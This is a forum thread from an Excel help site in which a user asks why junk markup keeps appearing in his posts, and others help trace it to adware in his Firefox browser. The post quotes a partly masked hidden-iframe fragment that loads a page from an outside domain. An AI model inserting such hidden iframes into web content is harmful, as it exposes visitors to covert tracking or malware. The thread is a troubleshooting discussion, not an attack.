Anyone Else Getting Garbage Text?

Micron

Office Version
  1. 365
Platform
  1. Windows
On this forum, I get this attached to just about every post I make, and sometimes 2x.

******** src="//102f.net/al1000.html" style="width: 1px; height: 1px; position: absolute; top: -10px; border: medium none;">*********>

Probably when I finish this one, it will get added so you would see it again. I've reported it but no response yet.
Anyone else? Is it me?

Which browser are you using?
Are you replying from a phone or some other sort of device (other than a PC)?
Are you crafting your replies elsewhere and copying and pasting them here?

Firefox 40.0.2; Toshiba laptop; no. But I did try to eliminate the text by copying into Notepad then back to the post and save. For a new post/reply it doesn't seem to matter if I save, then edit or go to advanced view, then save - it shows up. Funny thing is, in advanced view the preview doesn't show it before first save, but it's there when the post is saved. If it was already there and I go edit, (remove it), and preview, it's not there but shows up in the saved post. Once or twice I've tried to remove it only to have it entered 2x. It may or may not be different text in that case - I didn't pay enough attention. Since you're a moderator, you could probably scan my posts without too much effort since it's only been happening for a few days. There have been 2 FF updates this last week, so maybe there's something wrong with how this website processes the save in the latest version?

There have been 2 FF updates this last week, so maybe there's something wrong with how this website processes the save in the latest version?
Usually, when things like this start happening out of the blue, the first question to ask is "what changed recently", because that is often where the problem lies.
For a while, there were issues with the newest of Internet Explorer, and you had to run things in "Compatibility Mode". I am not sure if Fire Fox has anything like that (I don't use FireFox).

One easy way to test it out is to try posting using another browser (I use Google Chrome myself, I have had the least amount of issues with that). If you do not see the problems when posting from another browser, then you know the issue has to do with the recent changes made to FireFox and how it interacts with the forum.

Tried all the suggestions listed there and no trace of any files by that name, nor any registry entries (searched on all reg values, keys, etc.). Ran a scan with a malware program - nothing found. Did a complete online scan (Trend Micro) and found nothing. I will have to try a few posts with IE, but that will only be temporary!

It's looking like a Firefox thing (maybe one of the two add-ons I run). 3 or 4 posts using IE and no problem. I'll try again with ff and the add-ons disabled.

Came here because I got an email saying there was a new post, but I found nothing new. So I thought I might as well update that it was adware that targeted my default browser (FF) so that's why IE was OK. Sorry, can't recall which one, but Malwarebytes Anti-Malware took care of it.

Came here because I got an email saying there was a new post, but I found nothing new.

Couple of spammers, who got tanked.

Forum statistics

Threads
Members
Latest member
peppernaut

We've detected that you are using an adblocker.

We have a great community of people providing Excel help here, but the hosting costs are enormous. You can help keep this site running by allowing ads on MrExcel.com.
Allow Ads at MrExcel

Which adblocker are you using?

Disable AdBlock

Follow these easy steps to disable AdBlock

1)Click on the icon in the browser’s toolbar.
2)Click on the icon in the browser’s toolbar.
2)Click on the "Pause on this site" option.
Go back

Disable AdBlock Plus

Follow these easy steps to disable AdBlock Plus

2)Click on the toggle to disable it for "mrexcel.com".
Go back

Disable uBlock Origin

Follow these easy steps to disable uBlock Origin

2)Click on the "Power" button.
3)Click on the "Refresh" button.
Go back

Disable uBlock

Follow these easy steps to disable uBlock

2)Click on the "Power" button.
3)Click on the "Refresh" button.
Go back
Back